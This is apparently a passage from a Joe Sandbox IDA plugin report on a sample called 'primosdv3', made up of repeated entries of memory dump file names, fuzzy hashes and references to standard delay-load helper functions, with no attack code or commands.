Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f83f817ef7d3b434f0ce1c0ad9d338c04012a23a69f8eb750796d9e355a30cb6
Instruction ID: adae66e1da08e56c80bfa910efd680c6d8f9dce33955328ed6e3f84408da7e2c
Opcode Fuzzy Hash: f83f817ef7d3b434f0ce1c0ad9d338c04012a23a69f8eb750796d9e355a30cb6
Instruction Fuzzy Hash: D1B012C3258040BD3644510D6D06F3B021CC1C9F14330C07EF81CC00C0EC400C001433

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b9f17482b25d687fbdf4b9e650280acdc7186aa163f4bf524fba1d9516657ca2
Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
Opcode Fuzzy Hash: b9f17482b25d687fbdf4b9e650280acdc7186aa163f4bf524fba1d9516657ca2
Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c1351972046e76e3a7834ce4d79116ee5a4f2a6880ebe7854d56747d590a405c
Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
Opcode Fuzzy Hash: c1351972046e76e3a7834ce4d79116ee5a4f2a6880ebe7854d56747d590a405c
Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 650609d4af23ed3e27d904d10504575426dbec5d997a6e78b3be9db4e486d790
Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
Opcode Fuzzy Hash: 650609d4af23ed3e27d904d10504575426dbec5d997a6e78b3be9db4e486d790
Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a9324f7c83a94472d7a450b6d788506c5ed5b5b105bf2661de91d1a3699a09a5
Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
Opcode Fuzzy Hash: a9324f7c83a94472d7a450b6d788506c5ed5b5b105bf2661de91d1a3699a09a5
Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8d866e6ac42cd1039b407a626f0d5ba019044f280afdddeb4094a18e8c3bc488
Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
Opcode Fuzzy Hash: 8d866e6ac42cd1039b407a626f0d5ba019044f280afdddeb4094a18e8c3bc488
Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e62e237ce6a2e57402a709871d657661f860b68d5d528fc3f39c67063ecdd7ad
Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
Opcode Fuzzy Hash: e62e237ce6a2e57402a709871d657661f860b68d5d528fc3f39c67063ecdd7ad
Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 660f131768448a5ae0db13d22a024c7afe2d08b6bab4eac9f357bf7367090d2e
Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
Opcode Fuzzy Hash: 660f131768448a5ae0db13d22a024c7afe2d08b6bab4eac9f357bf7367090d2e
Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e546798748308b9535a081a31b1271dc97298514e15c2f671b849b0a36e8832d
Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
Opcode Fuzzy Hash: e546798748308b9535a081a31b1271dc97298514e15c2f671b849b0a36e8832d
Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 44d4a5d64e76f179a414342cf49bbc3504e28cf7828b638ae959216e4989279c
Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
Opcode Fuzzy Hash: 44d4a5d64e76f179a414342cf49bbc3504e28cf7828b638ae959216e4989279c
Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f3652957565e546442cce9b50d4aa2c6e5898cfa1e80c320e904ec4b93db90c1
Instruction ID: bb0ffb1d7fdb578cd430d76eee1ea53a9cd61bb0ce407f1a409bdfdf4ea730d5
Opcode Fuzzy Hash: f3652957565e546442cce9b50d4aa2c6e5898cfa1e80c320e904ec4b93db90c1
Instruction Fuzzy Hash: 6BA001E72AD142BD7A08A2566D4BD3B021DC5C9B65371C9BEF82AC54C2A89068456872

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0e173c9cbfc6cb4b87da0bc852cc6eb429ff4d2ec3821dd0cfb14005c9b34b5d
Instruction ID: 3b24b2c6d6bb41feb24824dd3429ed99272e4d1e365d3c0042d494a8afd17f14
Opcode Fuzzy Hash: 0e173c9cbfc6cb4b87da0bc852cc6eb429ff4d2ec3821dd0cfb14005c9b34b5d
Instruction Fuzzy Hash: EEA001E72A9152BD3608A2566D4AD3B022DC5C9B29330D5AEF829A54D1AC8018456873

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 78f2fd04240114c1ba60bdb51211905b2e105a8ea719780485c85d8afa624444
Instruction ID: 6f7d1bd0098ebe20b275e93ab869be723f7cd3ed87eeafd98d528a97047263a3
Opcode Fuzzy Hash: 78f2fd04240114c1ba60bdb51211905b2e105a8ea719780485c85d8afa624444
Instruction Fuzzy Hash: 05A001E72A9152BC3608A2566D4AD3B022DC5C9B65330D9AEF82A954D1A88018456873

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 317f630a4c79e5bf715688f270eb9e86f74a1027153d19762bac3b9d0f6c659b
Instruction ID: 6f7d1bd0098ebe20b275e93ab869be723f7cd3ed87eeafd98d528a97047263a3
Opcode Fuzzy Hash: 317f630a4c79e5bf715688f270eb9e86f74a1027153d19762bac3b9d0f6c659b
Instruction Fuzzy Hash: 05A001E72A9152BC3608A2566D4AD3B022DC5C9B65330D9AEF82A954D1A88018456873

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 646a9370251087b1ed7f626e9261d7c24ca6d56b60effba9a79bf8c615012bda
Instruction ID: 6f7d1bd0098ebe20b275e93ab869be723f7cd3ed87eeafd98d528a97047263a3
Opcode Fuzzy Hash: 646a9370251087b1ed7f626e9261d7c24ca6d56b60effba9a79bf8c615012bda
Instruction Fuzzy Hash: 05A001E72A9152BC3608A2566D4AD3B022DC5C9B65330D9AEF82A954D1A88018456873

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
